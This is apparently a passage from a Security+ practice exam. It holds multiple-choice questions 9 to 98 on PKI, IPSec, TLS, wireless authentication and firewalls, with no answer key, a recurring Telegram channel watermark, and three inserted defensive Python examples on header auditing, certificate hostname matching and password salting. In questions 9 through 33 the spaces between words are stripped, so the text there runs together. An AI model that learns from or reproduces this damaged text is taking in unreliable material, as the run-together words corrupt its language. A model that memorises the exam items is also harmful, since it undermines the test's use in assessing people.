9. CharleshasbeenaskedtoimplementDNSSECforhisorganization.Whichofthefollowingdoesitprovide?
A. Confidentiality
B. Integrity
C. Availability
D. Alloftheabove
Telegram Channel @nettrain
10. SarahhasimplementedanOpenID-basedauthenticationsystemthatreliesonexistingGoogleaccounts.WhatroledoesGoogleplayinafederatedenvironmentlikethis?
A. AnRP
B. AnIdP
C. AnSP
D. AnRA
11. Ianneedstoconnecttoasystemviaanencryptedchannelsothathecanuseacommand-lineshell.Whatprotocolshouldheuse?
A. Telnet
B. HTTPS
C. SSH
D. TLS
12. Caseyisconsideringimplementingpasswordkeydevicesforherorganization.Shewantstouseabroadlyadoptedopenstandardforauthenticationandneedsherkeystosupportthat.Whichofthefollowingstandardsshouldshelookforherkeystoimplement,inadditiontobeingabletoconnectviaUSB,Bluetooth,andNFC?
A. SAML
B. FIDO
C. ARF
D. OpenID
13. NadiaisconcernedaboutthecontentofheremailstoherfriendDaniellebeingreadastheymovebetweenservers.Whattechnologycansheusetoencryptheremails,andwhosekeyshouldsheusetoencryptthemessage?
A. S/MIME,herprivatekey
B. SecurePOP3,herpublickey
C. S/MIME,Danielle'spublickey
D. SecurePOP3,Danielle'sprivatekey
14. WhattypeofcommunicationsisSRTPmostlikelytobeusedfor?
Telegram Channel @nettrain
A. Email
B. VoIP
C. Web
D. Filetransfer
15. Oliviaisimplementingaload-balancedwebapplicationcluster.Herorganizationalreadyhasaredundantpairofloadbalancers,buteachunitisnotratedtohandlethemaximumdesignedthroughputoftheclusterbyitself.Oliviahasrecommendedthattheloadbalancersbeimplementedinanactive/activedesign.Whatconcernshouldsheraiseaspartofthisrecommendation?
A. Theloadbalancerclustercannotbepatchedwithoutaserviceoutage.
B. Theloadbalancerclusterisvulnerabletoadenial-of-serviceattack.
C. Ifoneoftheloadbalancersfails,itcouldleadtoservicedegradation.
D. Noneoftheabove
16. WhattwoportsaremostcommonlyusedforFTPStraffic?
A. 21,990
B. 21,22
C. 433,1433
D. 20,21
17. Whatoccurswhenacertificateisstapled?
A. BoththecertificateandOCSPresponderaresenttogethertopreventadditionalretrievalsduringcertificatepathvalidation.
B. Thecertificateisstoredinasecuredlocationthatpreventsthecertificatefrombeingeasilyremovedormodified.
C. Boththehostcertificateandtherootcertificateauthority'sprivatekeyareattachedtovalidatetheauthenticityofthechain.
D. Thecertificateisattachedtoothercertificatestodemonstratetheentirecertificatechain.
18. Gregissettingupapublickeyinfrastructure(PKI).Hecreatesanofflinerootcertificateauthority(CA)andthenneedstoissuecertificatestousers
Telegram Channel @nettrain
anddevices.WhatsystemordeviceinaPKIreceivescertificatesigningrequests(CSRs)fromapplications,systems,andusers?
A. AnintermediaCA
B. AnRA
C. ACRL
D. Noneoftheabove
19. Markisresponsibleformanaginghiscompany'sloadbalancerandwantstouseaload-balancingschedulingtechniquethatwilltakeintoaccountthecurrentserverloadandactivesessions.Whichofthefollowingtechniquesshouldhechoose?
A. SourceIPhashing
B. Weightedresponsetime
C. Leastconnection
D. Roundrobin
20. Duringasecurityreview,MattnoticesthatthevendorheisworkingwithliststheirIPSecvirtualprivatenetwork(VPN)asusingAHprotocolforsecurityofthepacketsthatitsends.WhatconcernshouldMattnotetohisteamaboutthis?
A. AHdoesnotprovideconfidentiality.
B. AHdoesnotprovidedataintegrity.
C. AHdoesnotprovidereplayprotection.
D. Noneoftheabove;AHprovidesconfidentiality,authentication,andreplayprotection.
21. MichellewantstosecuremailbeingretrievedviathePostOfficeProtocolVersion3(POP3)becausesheknowsthatitisunencryptedbydefault.WhatisherbestoptiontodothiswhileleavingPOP3runningonitsdefaultport?
A. UseTLSviaport25.
B. UseIKEviaport25.
C. UseTLSviaport110.
Telegram Channel @nettrain
D. UseIKEviaport110.
22. Danielworksforamid-sizedfinancialinstitution.Thecompanyhasrecentlymovedsomeofitsdatatoacloudsolution.Danielisconcernedthatthecloudprovidermaynotsupportthesamesecuritypoliciesasthecompany'sinternalnetwork.Whatisthebestwaytomitigatethisconcern?
A. Implementacloudaccesssecuritybroker.
B. Performintegrationtesting.
C. Establishcloudsecuritypolicies.
D. Implementsecurityasaservice.
23. ThecompanythatAngelaworksforhasdeployedaVoiceoverIP(VoIP)environmentthatusesSIP.Whatthreatisthemostlikelyissuefortheirphonecalls?
A. Callinterception
B. Vishing
C. Wardialing
D. Denial-of-serviceattacks
24. AlainaisconcernedaboutthesecurityofherNTPtimesynchronizationservicebecausesheknowsthatprotocolslikeTLSandBGParesusceptibletoproblemsiffakeNTPmessageswereabletocausetimemismatchesbetweensystems.WhattoolcouldsheusetoquicklyprotectherNTPtrafficbetweenLinuxsystems?
A. AnIPSecVPN
B. SSHtunneling
C. RDP
D. ATLSVPN
25. RamonisbuildinganewwebserviceandisconsideringwhichpartsoftheserviceshoulduseTransportLayerSecurity(TLS).Componentsoftheapplicationinclude:
1. Authentication
2. Apaymentform
Telegram Channel @nettrain
3. Userdata,includingaddressandshoppingcart
4. Ausercommentsandreviewssection
WhereshouldheimplementTLS?
A. Atpoints1and2,and4
B. Atpoints2and3,and4
C. Atpoints1,2,and3
D. Atallpointsintheinfrastructure
26. Katie'sorganizationusesFileTransferProtocol(FTP)forcontractorstosubmittheirworkproducttoherorganization.Thecontractorsworkonsensitivecustomerinformation,andthenuseorganizationalcredentialsprovidedbyKatie'scompanytologinandtransfertheinformation.Whatsensitiveinformationcouldattackersgatheriftheywereabletocapturethenetworktrafficinvolvedinthistransfer?
A. Nothing,becauseFTPisasecureprotocol
B. IPaddressesforbothclientandserver
C. Thecontentofthefilesthatwereuploaded
D. Usernames,passwords,andfilecontent
27. WhatsecuritybenefitsareprovidedbyenablingDHCPsnoopingorDHCPsniffingonswitchesinyournetwork?
A. PreventionofmaliciousormalformedDHCPtraffic
B. PreventionofrogueDHCPservers
C. CollectionofinformationaboutDHCPbindings
D. Alloftheabove
28. Aaronwantstouseacertificateforthefollowingproductionhosts:
www.example.com
blog.example.com
news.example.com
WhatisthemostefficientwayforhimtoprovideTransportLayerSecurity(TLS)forallofthesesystems?
A. Useself-signedcertificates.
Telegram Channel @nettrain
B. Useawildcardcertificate.
C. UseanEVcertificate.
D. UseanSSLcertificate.
29. Cassandraisconcernedaboutattacksagainsthernetwork'sSpanningTreeProtocol(STP).ShewantstoensurethatanewswitchintroducedbyanattackercannotchangethetopologybyassertingalowerbridgeIDthanthecurrentconfiguration.Whatshouldsheimplementtopreventthis?
A. EnableBridgeProtect.
B. SetthebridgeIDtoanegativenumber.
C. DisableSpanningTreeprotocol.
D. EnableRootGuard.
30. CharlesfindsaPFXformattedfileonthesystemheisreviewing.WhatisaPFXfilecapableofcontaining?
A. Onlycertificatesandchaincertificates,notprivatekeys
B. Onlyaprivatekey
C. Aservercertificate,intermediatecertificates,andtheprivatekey
D. Noneoftheabove,becausePFXfilesareusedforcertificaterequestsonly
31. Whichdevicewouldmostlikelyprocessthefollowingrules?
PERMITIPANYEQ443
DENYIPANYANY
A. NIPS
B. HIPS
C. Contentfilter
D. Firewall
32. TedwantstouseIPreputationinformationtoprotecthisnetworkandknowsthatthirdpartiesprovidethatinformation.Howcanhegetthisdata,andwhatsecureprotocolishemostlikelytousetoretrieveit?
A. Asubscriptionservice,SAML
Telegram Channel @nettrain
B. AVDI,XML
C. Asubscriptionservice,HTTPS
D. AnFDE,XML
33. WhatdoessettingthesecureattributeforanHTTPcookieresultin?
A. Cookieswillbestoredinencryptedform.
B. CookieswillbesentonlyoverHTTPS.
C. Cookieswillbestoredinhashedform.
D. Cookiesmustbeaccessedusingacookiekey.
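Questions 5 and 33 both turn on protections a server signals in its HTTP response headers: Strict-Transport-Security for transport security, Content-Security-Policy against cross-site scripting, X-Content-Type-Options: nosniff against MIME sniffing, and the Secure (together with HttpOnly and SameSite) attributes on Set-Cookie. The Python audit below is an added example and not part of the book; it parses a raw response head and reports what is missing. The two responses it checks are constructed, while the header and attribute names are the real ones. Nothing in it looks for a header against SQL injection, because no such header exists; that defense lives in the application's queries and input handling.

```python
"""Added example: audit the security headers of an HTTP response.

Checks the header-based controls behind questions 5 and 33: HSTS,
Content-Security-Policy, X-Content-Type-Options: nosniff and the
Secure / HttpOnly / SameSite attributes on every Set-Cookie.
The two responses at the bottom are constructed for the demo.
"""
from typing import List, Tuple


def parse_head(raw: str) -> List[Tuple[str, str]]:
    """Split a raw response head into lower-cased (name, value) pairs.

    Duplicates are kept because a response may carry several Set-Cookie
    lines, each of which must be checked on its own.
    """
    lines = raw.strip().splitlines()
    headers = []
    for line in lines[1:]:  # lines[0] is the status line
        if not line.strip():  # a blank line ends the head
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def cookie_findings(set_cookie: str) -> List[str]:
    """Report attributes missing from one Set-Cookie value."""
    parts = [p.strip() for p in set_cookie.split(";")]
    cookie_name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    findings = []
    if "secure" not in attrs:  # the attribute question 33 asks about
        findings.append(f"cookie {cookie_name}: no Secure, may be sent over plain HTTP")
    if "httponly" not in attrs:
        findings.append(f"cookie {cookie_name}: no HttpOnly, readable by injected script")
    if "samesite" not in attrs:
        findings.append(f"cookie {cookie_name}: no SameSite, sent on cross-site requests")
    return findings


def audit_response(raw: str) -> List[str]:
    """Return a list of findings; an empty list means every check passed."""
    headers = parse_head(raw)
    present = {name for name, _ in headers}
    findings = []
    if "strict-transport-security" not in present:
        findings.append("no Strict-Transport-Security: browsers are not pinned to HTTPS")
    if "content-security-policy" not in present:
        findings.append("no Content-Security-Policy: no header-level XSS mitigation")
    nosniff = [v.lower() for n, v in headers if n == "x-content-type-options"]
    if "nosniff" not in nosniff:
        findings.append("no X-Content-Type-Options: nosniff: MIME sniffing allowed")
    for name, value in headers:
        if name == "set-cookie":
            findings.extend(cookie_findings(value))
    # Deliberately no check for a 'SQL injection' header: none exists.
    return findings


# Constructed sample responses (not captured from a real server).
WEAK_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=abc123; Path=/
Set-Cookie: prefs=dark; Path=/; Secure; HttpOnly; SameSite=Lax
"""

HARDENED_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Strict
"""

if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"{label}: {audit_response(response) or ['all checks passed']}")
```

Run against a live server, the same function works on the output of `curl -sI https://host/` once the status line is kept as the first line; the weak sample produces six findings (three missing headers and three missing attributes on the session cookie), the hardened one none.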
34. Charles wants to use IPSec and needs to be able to determine the IPSec policy for traffic based on the port it is being sent to on the remote system. Which IPSec mode should he use?
A. IPSec tunnel mode
B. IPSec IKE mode
C. IPSec PSK mode
D. IPSec transport mode
35. Wi-Fi Protected Setup (WPS) includes four modes for adding devices to a network. Which mode has significant security concerns due to a brute-force exploit?
A. PIN
B. USB
C. Push button
D. Near-field communication
36. Claire wants to check whether a certificate has been revoked. What protocol is used to validate certificates?
A. RTCP
B. CRBL
C. OCSP
D. PKCRL
37. Nick is responsible for cryptographic keys in his company. What is the best way to deauthorize a public key?
A. Send out a network alert.
B. Delete the digital certificate.
C. Publish that certificate in the CRL.
D. Notify the RA.
38. What two connection methods are used for most geofencing applications?
A. Cellular and GPS
B. USB and Bluetooth
C. GPS and Wi-Fi
D. Cellular and Bluetooth
39. Gabriel is setting up a new e-commerce server. He is concerned about security issues. Which of the following would be the best location to place an e-commerce server?
A. DMZ
B. Intranet
C. Guest network
D. Extranet
40. Janelle is the security administrator for a small company. She is trying to improve security throughout the network. Which of the following steps should she take first?
A. Implement antimalware on all computers.
B. Implement acceptable use policies.
C. Turn off unneeded services on all computers.
D. Set password reuse policies.
41. Ben is responsible for a new application with a worldwide user base that will allow users to sign up to access existing data about them. He would like to use a method of authentication that will permit him to verify that users are the correct people to match up with their accounts. How can he validate these users?
A. Require that they present their Social Security number.
B. Require them to use a federated identity via Google.
C. Require them to use knowledge-based authentication.
D. Require them to validate an email sent to the account they signed up with.
42. Jason wants to implement a remote access virtual private network (VPN) for users in his organization who primarily rely on hosted web applications. What common VPN type is best suited to this if he wants to avoid deploying client software to his end-user systems?
A. A TLS VPN
B. An RDP (Remote Desktop Protocol) VPN
C. An Internet Control Message Protocol (ICMP) VPN
D. An IPSec VPN
43. Juan is a network administrator for an insurance company. His company has a number of traveling salespeople. He is concerned about confidential data on their laptops. What is the best way for him to address this?
A. FDE
B. TPM
C. SDN
D. DMZ
44. Which design concept limits access to systems from outside users while protecting users and systems inside the LAN?
A. DMZ
B. VLAN
C. Router
D. Guest network
45. Nina wants to use information about her users like their birthdates, addresses, and job titles as part of her identity management system. What term is used to describe this type of information?
A. Roles
B. Factors
C. Identifiers
D. Attributes
46. Megan is preparing a certificate signing request (CSR) and knows that she needs to provide a CN for her web server. What information will she put into the CN field for the CSR?
A. Her name
B. The hostname
C. The company's name
D. The fully qualified domain name of the system
47. Which of the following is the equivalent of a VLAN from a physical security perspective?
A. Perimeter security
B. Partitioning
C. Security zones
D. Firewall
48. Nelson uses a tool that lists the specific applications that can be installed and run on a system. The tool uses hashes of the application's binary to identify each application to ensure that the application matches the filename provided for it. What type of tool is Nelson using?
A. Antivirus
B. Blacklisting
C. Antimalware
D. Whitelisting
49. Which type of firewall examines the content and context of each packet it encounters?
A. Packet filtering firewall
B. Stateful packet filtering firewall
C. Application layer firewall
D. Gateway firewall
50. As part of his wireless network deployment efforts, Scott generates the image shown here. What term is used to describe this type of visualization of wireless networks?
A. A heatmap
B. A network diagram
C. A zone map
D. A DMZ
51. You're designing a new network infrastructure so that your company can allow unauthenticated users connecting from the Internet to access certain areas. Your goal is to protect the internal network while providing access to those areas. You decide to put the web server on a separate subnet open to public contact. What is this subnet called?
A. Guest network
B. DMZ
C. Intranet
D. VLAN
52. Madhuri's web application converts numbers that are input into fields by specifically typing them and then applies strict exception handling. It also sets a minimum and maximum length for the inputs that it allows and uses predefined arrays of allowed values for inputs like months or dates. What term describes the actions that Madhuri's application is performing?
A. Buffer overflow prevention
B. String injection
C. Input validation
D. Schema validation
53. You're outlining your plans for implementing a wireless network to upper management. What wireless security standard should you adopt if you don't want to use enterprise authentication but want to provide secure authentication for users that doesn't require a shared password or passphrase?
A. WPA3
B. WPA
C. WPA2
D. WEP
54. Brandon wants to ensure that his intrusion prevention system (IPS) is able to stop attack traffic. Which deployment method is most appropriate for this requirement?
A. Inline, deployed as an IPS
B. Passive via a tap, deployed as an IDS
C. Inline, deployed as an IDS
D. Passive via a tap, deployed as an IPS
55. You are the chief security officer (CSO) for a large company. You have discovered malware on one of the workstations. You are concerned that the malware might have multiple functions and might have caused more security issues with the computer than you can currently detect. What is the best way to test this malware?
A. Leave the malware on that workstation until it is tested.
B. Place the malware in a sandbox environment for testing.
C. It is not important to analyze or test it; just remove it from the machine.
D. Place the malware on a honeypot for testing.
56. You are trying to increase security at your company. You're currently creating an outline of all the aspects of security that will need to be examined and acted on. Which of the following terms describes the process of improving security in a trusted OS?
A. FDE
B. Hardening
C. SED
D. Baselining
57. Melissa's website provides users who access it via HTTPS with a Transport Layer Security (TLS) connection. Unfortunately, Melissa forgot to renew her certificate, and it is presenting users with an error. What happens to the HTTPS connection when a certificate expires?
A. All traffic will be unencrypted.
B. Traffic for users who do not click OK at the certificate error will be unencrypted.
C. Trust will be reduced, but traffic will still be encrypted.
D. Users will be redirected to the certificate authority's site for a warning until the certificate is renewed.
58. Isaac is reviewing his organization's secure coding practices document for customer-facing web applications and wants to ensure that their input validation recommendations are appropriate. Which of the following is not a common best practice for input validation?
A. Ensure validation occurs on a trusted server.
B. Validate all client-supplied data before it is processed.
C. Validate expected data types and ranges.
D. Ensure validation occurs on a trusted client.
59. Frank knows that the systems he is deploying have a built-in TPM module. Which of the following capabilities is not a feature provided by a TPM?
A. A random number generator
B. Remote attestation capabilities
C. A cryptographic processor used to speed up SSL/TLS
D. The ability to bind and seal data
60. What is the primary use of hashing in databases?
A. To encrypt stored data, thus preventing exposure
B. For indexing and retrieval
C. To obfuscate data
D. To substitute for sensitive data, allowing it to be used without exposure
61. Hans is a security administrator for a large company. Users on his network visit a wide range of websites. He is concerned they might get malware from one of these many websites. Which of the following would be his best approach to mitigate this threat?
A. Implement host-based antivirus.
B. Blacklist known infected sites.
C. Set browsers to allow only signed components.
D. Set browsers to block all active content (ActiveX, JavaScript, etc.).
62. Zarmeena has implemented wireless authentication for her network using a passphrase that she distributes to each member of her organization. What type of authentication method has she implemented?
A. Enterprise
B. PSK
C. Open
D. Captive portal
63. Olivia is building a wireless network and wants to implement an Extensible Authentication Protocol (EAP)-based protocol for authentication. What EAP version should she use if she wants to prioritize reconnection speed and doesn't want to deploy client certificates for authentication?
A. EAP-FAST
B. EAP-TLS
C. PEAP
D. EAP-TTLS
64. You work at a large company. You are concerned about ensuring that all workstations have a common configuration, that no rogue software is installed, and that all patches are kept up to date. Which of the following would be the most effective for accomplishing this?
A. Use VDI.
B. Implement restrictive policies.
C. Use an image for all workstations.
D. Implement strong patch management.
65. Naomi has deployed her organization's cloud-based virtual datacenters to multiple Google datacenter locations around the globe. What does this design provide for her systems?
A. Resistance to insider attacks
B. High availability across multiple zones
C. Decreased costs
D. Vendor diversity
66. Patrick wants to deploy a virtual private networking (VPN) technology that is as easy for end users to use as possible. What type of VPN should he deploy?
A. An IPSec VPN
B. An SSL/TLS VPN
C. An HTML5 L2TP VPN
D. An SAML VPN
67. Olivia is responsible for web application security for her company's e-commerce server. She is particularly concerned about XSS and SQL injection. Which technique would be most effective in mitigating these attacks?
A. Proper error handling
B. The use of stored procedures
C. Proper input validation
D. Code signing
68. Isaac wants to prevent corporate mobile devices from being used outside of his company's buildings and corporate campus. What mobile device management (MDM) capability should he use to allow this?
A. Patch management
B. IP filtering
C. Geofencing
D. Network restrictions
69. Sophia wants to test her company's web application to see if it is handling input validation and data validation properly. Which testing method would be most effective for this?
A. Static code analysis
B. Fuzzing
C. Baselining
D. Version control
70. Alaina has implemented an HSM. Which of the following capabilities is not a typical HSM feature?
A. Encryption and decryption for digital signatures
B. Boot attestation
C. Secure management of digital keys
D. Strong authentication support
71. Cynthia wants to issue contactless cards to provide access to the buildings she is tasked with securing. Which of the following technologies should she deploy?
A. RFID
B. Wi-Fi
C. Magstripe
D. HOTP
72. Alaina wants to prevent bulk gathering of email addresses and other directory information from her web-exposed LDAP directory. Which of the following solutions would not help with this?
A. Using a back-off algorithm
B. Implementing LDAPS
C. Requiring authentication
D. Rate limiting queries
73. Alaina has been told that her organization uses a SAN certificate in their environment. What does this tell Alaina about the certificate in use in her organization?
A. It is used for a storage area network.
B. It is provided by SANS, a network security organization.
C. The certificate is part of a self-signed, self-assigned namespace.
D. The certificate allows multiple hostnames to be protected by the same certificate.
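Questions 28, 46 and 73 are all about which names a certificate covers: the CN supplied in a CSR, a wildcard such as *.example.com, and a SAN certificate that lists several hostnames. The Python below, an added example rather than the book's material, implements the hostname-matching rule a TLS client applies to those names: SAN dNSName entries are authoritative whenever the certificate has any, the CN is only a legacy fallback (modern browsers ignore it entirely), and a wildcard is honoured only as the whole left-most label and only for exactly one label. The certificate dictionaries are constructed stand-ins for parsed certificates, not real ones.

```python
"""Added example: TLS hostname matching against CN, SAN and wildcard names.

Implements the matching rule behind questions 28, 46 and 73:
  * SAN dNSName entries are authoritative when the certificate has any;
  * the CN is consulted only when there are no SAN dNSNames (legacy behaviour);
  * a wildcard is honoured only as the entire left-most label, matching
    exactly one label, and never for a bare second-level name like *.com.
The certificate dictionaries below are constructed stand-ins for parsed certs.
"""
from typing import Dict, List


def name_matches(pattern: str, host: str) -> bool:
    """Match one certificate name (possibly a wildcard) against a hostname."""
    p = pattern.lower().rstrip(".").split(".")
    h = host.lower().rstrip(".").split(".")
    if len(p) != len(h):
        return False  # a wildcard covers exactly one label, never zero or two
    if p[0] == "*":
        # Require at least two labels after the wildcard so *.com never matches.
        return len(p) >= 3 and p[1:] == h[1:]
    return p == h  # partial wildcards like f*.example.com are not honoured


def cert_covers_host(cert: Dict[str, object], host: str) -> bool:
    """Decide whether a certificate is valid for `host`.

    `cert` is {"cn": str, "san": [dNSName, ...]}; SAN wins whenever present.
    """
    sans: List[str] = list(cert.get("san", []))
    if sans:
        return any(name_matches(name, host) for name in sans)
    cn = cert.get("cn")
    return bool(cn) and name_matches(str(cn), host)


# Constructed certificates for the hosts in question 28.
WILDCARD_CERT = {"cn": "*.example.com", "san": ["*.example.com", "example.com"]}
SAN_CERT = {
    "cn": "www.example.com",
    "san": ["www.example.com", "blog.example.com", "news.example.com"],
}
CN_ONLY_CERT = {"cn": "www.example.com", "san": []}
MISMATCHED_CERT = {"cn": "www.example.com", "san": ["blog.example.com"]}

QUESTION_28_HOSTS = ("www.example.com", "blog.example.com", "news.example.com")


def hosts_covered(cert: Dict[str, object], hosts=QUESTION_28_HOSTS) -> List[str]:
    """List which of the given hosts a certificate is valid for."""
    return [h for h in hosts if cert_covers_host(cert, h)]


if __name__ == "__main__":
    for label, cert in (("wildcard", WILDCARD_CERT), ("SAN", SAN_CERT),
                        ("CN only", CN_ONLY_CERT), ("mismatched", MISMATCHED_CERT)):
        print(f"{label}: {hosts_covered(cert)}")
```

The mismatched certificate is the case practitioners trip over: its CN says www.example.com, but because it carries a SAN list that only names blog.example.com, a client will reject it for www.example.com. Putting the FQDN in the CN (question 46) is therefore not enough on its own; the same name has to appear in the SAN.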
74. Edward is responsible for web application security at a large insurance company. One of the applications that he is particularly concerned about is used by insurance adjusters in the field. He wants to have strong authentication methods to mitigate misuse of the application. What would be his best choice?
A. Authenticate the client with a digital certificate.
B. Implement a very strong password policy.
C. Secure application communication with Transport Layer Security (TLS).
D. Implement a web application firewall (WAF).
75. Sarah is the CIO for a small company. The company uses several custom applications that have complicated interactions with the host operating system. She is concerned about ensuring that systems on her network are all properly patched. What is the best approach in her environment?
A. Implement automatic patching.
B. Implement a policy that has individual users patch their systems.
C. Delegate patch management to managers of departments so that they can find the best patch management for their departments.
D. Immediately deploy patches to a test environment; then as soon as testing is complete, have a staged rollout to the production network.
76. Gary uses a wireless analyzer to perform a site survey of his organization. Which of the following is not a common feature of a wireless analyzer's ability to provide information about the wireless networks around it?
A. The ability to show signal strength of access points on a map of the facility
B. The ability to show the version of the RADIUS server used for authentication
C. The ability to show a list of SSIDs available in a given location
D. The ability to show the version of the 802.11 protocol (n, ac, ax)
77. Emiliano is a network administrator and is concerned about the security of peripheral devices. Which of the following would be a basic step he could take to improve security for those devices?
A. Implement FDE.
B. Turn off remote access (SSH, Telnet, etc.) if not needed.
C. Utilize fuzz testing for all peripherals.
D. Implement digital certificates for all peripherals.
78. What type of code analysis is manual code review?
A. Dynamic code review
B. Fagan code review
C. Static code review
D. Fuzzing
79. Samantha has used ssh-keygen to generate new SSH keys. Which SSH key should she place on the server she wants to access, and where is it typically stored on a Linux system?
A. Her public SSH key, /etc/
B. Her private SSH key, /etc/
C. Her public SSH key, ~/.ssh
D. Her private SSH key, ~/.ssh
80. Ixxia is a software development team manager. She is concerned about memory leaks in code. What type of testing is most likely to find memory leaks?
A. Fuzzing
B. Stress testing
C. Static code analysis
D. Normalization
81. What IP address does a load balancer provide for external connections to connect to web servers in a load-balanced group?
A. The IP address for each server, in a prioritized order
B. The load balancer's IP address
C. The IP address for each server in a round-robin order
D. A virtual IP address
82. What term describes random bits that are added to a password before it is hashed and stored in a database?
A. Flavoring
B. Rainbow-armor
C. Bit-rot
D. Salt
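Questions 82, 179 and 188 meet in one mechanism: a password is combined with a random per-password salt and run through a slow, key-stretching construction such as bcrypt before it is stored. The Python below is an added example and not the book's code; it uses the standard library's PBKDF2-HMAC-SHA256 as the stretching function in place of bcrypt. It stores the same password list twice, once with Fred's fixed salt 89EA443CCDA16B89 from question 179 and once with a fresh 16-byte salt per password. Identical passwords produce identical digests under the reused salt, which is exactly what lets one precomputed table crack every account at once; with per-password salts they do not. The sample passwords and the iteration count are constructed for the demo.

```python
"""Added example: salting and key stretching for stored passwords.

Ties together questions 82 (salt), 179 (reused salt) and 188 (key stretching).
PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt as the
stretching function. Sample passwords and the iteration count are constructed.
"""
import hashlib
import hmac
import os
from typing import List

# Fred's salt from question 179, prepended to every password: the flaw is reuse.
FIXED_SALT = bytes.fromhex("89EA443CCDA16B89")
# Work factor: tune it so one hash takes tens of milliseconds on your hardware.
ITERATIONS = 100_000
SALT_BYTES = 16


def new_salt() -> bytes:
    """A fresh random salt; generated per password, never shared."""
    return os.urandom(SALT_BYTES)


def hash_password(password: str, salt: bytes, iterations: int = ITERATIONS) -> str:
    """Stretch the password and return a self-describing record."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and iterations; compare in constant time."""
    _, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def store_with_reused_salt(passwords: List[str]) -> List[str]:
    """What Fred does: every record shares FIXED_SALT."""
    return [hash_password(p, FIXED_SALT) for p in passwords]


def store_with_random_salts(passwords: List[str]) -> List[str]:
    """The fix: every record gets its own salt."""
    return [hash_password(p, new_salt()) for p in passwords]


def duplicate_digests(records: List[str]) -> int:
    """How many records share a digest with another record.

    With a reused salt, users who chose the same password are visible at a
    glance and a single precomputed table covers all of them.
    """
    digests = [r.rsplit("$", 1)[1] for r in records]
    return len(digests) - len(set(digests))


# Constructed sample: two users picked the same password.
SAMPLE_PASSWORDS = ["Winter2021!", "Winter2021!", "correct horse battery staple"]

if __name__ == "__main__":
    reused = store_with_reused_salt(SAMPLE_PASSWORDS)
    random_salted = store_with_random_salts(SAMPLE_PASSWORDS)
    print("duplicates with reused salt:", duplicate_digests(reused))
    print("duplicates with random salts:", duplicate_digests(random_salted))
    print("verify ok:", verify_password(SAMPLE_PASSWORDS[2], random_salted[2]))
```

Note that Fred's 8-byte value is long enough as a salt; the defect the question points at is that it never changes. The record format stores the salt and iteration count alongside the digest so that the work factor can be raised later without breaking verification of older records.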
83. Victor is a network administrator for a medium-sized company. He wants to be able to access servers remotely so that he can perform small administrative tasks from remote locations. Which of the following would be the best protocol for him to use?
A. SSH
B. Telnet
C. RSH
D. SNMP
84. Dan configures a resource-based policy in his Amazon account. What control has he deployed?
A. A control that determines who has access to the resource, and the actions they can take on it
B. A control that determines the amount that a service can cost before an alarm is sent
C. A control that determines the amount of a finite resource that can be consumed before an alarm is sent
D. A control that determines what an identity can do
85. Charlene's company uses rack-mounted sensor appliances in their datacenter. What are sensors like these typically monitoring?
A. Temperature and humidity
B. Smoke and fire
C. Power quality and reliability
D. None of the above
86. Laurel is reviewing the configuration for an email server in her organization and discovers that there is a service running on TCP port 993. What secure email service has she most likely discovered?
A. Secure POP3
B. Secure SMTP
C. Secure IMAP (IMAPS)
D. Secure MIME (S/MIME)
87. What type of topology does an ad hoc wireless network use?
A. Point-to-multipoint
B. Star
C. Point-to-point
D. Bus
88. What is the primary advantage of allowing only signed code to be installed on computers?
A. It guarantees that malware will not be installed.
B. It improves patch management.
C. It verifies who created the software.
D. It executes faster on computers with a Trusted Platform Module (TPM).
89. Samantha has been asked to provide a recommendation for her organization about password security practices. Users have complained that they have to remember too many passwords as part of their job and that they need a way to keep track of them. What should Samantha recommend?
A. Recommend that users write passwords down near their workstation.
B. Recommend that users use the same password for sites with similar data or risk profiles.
C. Recommend that users change their standard passwords slightly based on the site they are using.
D. Recommend a password vault or manager application.
90. Matt has enabled port security on the network switches in his building. What does port security do?
A. Filters by MAC address
B. Prevents routing protocol updates from being sent from protected ports
C. Establishes private VLANs
D. Prevents duplicate MAC addresses from connecting to the network
91. Tom is responsible for VPN connections in his company. His company uses IPSec for VPNs. What is the primary purpose of AH in IPSec?
A. Encrypt the entire packet.
B. Encrypt just the header.
C. Authenticate the entire packet.
D. Authenticate just the header.
92. Miles wants to ensure that his internal DNS cannot be queried by outside users. What DNS design pattern uses different internal and external DNS servers to provide potentially different DNS responses to users of those networks?
A. DNSSEC
B. Split horizon DNS
C. DMZ DNS
D. DNS proxying
93. Abigail is responsible for setting up a network-based intrusion prevention system (NIPS) on her network. The NIPS is located in one particular network segment. She is looking for a passive method to get a copy of all traffic to the NIPS network segment so that it can analyze the traffic. Which of the following would be her best choice?
A. Using a network tap
B. Using port mirroring
C. Setting the NIPS on a VLAN that is connected to all other segments
D. Setting up a NIPS on each segment
94. Amanda wants to allow users from other organizations to log in to her wireless network. What technology would allow her to do this using their own home organization's credentials?
A. Preshared keys
B. 802.11q
C. RADIUS federation
D. OpenID Connect
95. Nathan wants to ensure that the mobile devices his organization has deployed can only be used in the company's facilities. What type of authentication should he deploy to ensure this?
A. PINs
B. Biometrics
C. Context-aware authentication
D. Content-aware authentication
96. Which of the following best describes a TPM?
A. Transport Protection Mode
B. A secure cryptoprocessor
C. A DNSSEC extension
D. Total Patch Management
97. Janice is explaining how IPSec works to a new network administrator. She is trying to explain the role of IKE. Which of the following most closely matches the role of IKE in IPSec?
A. It encrypts the packet.
B. It establishes the SAs.
C. It authenticates the packet.
D. It establishes the tunnel.
98. What certificate is most likely to be used by an offline certificate authority (CA)?
A. Root
B. Machine/computer
C. User
D. Email
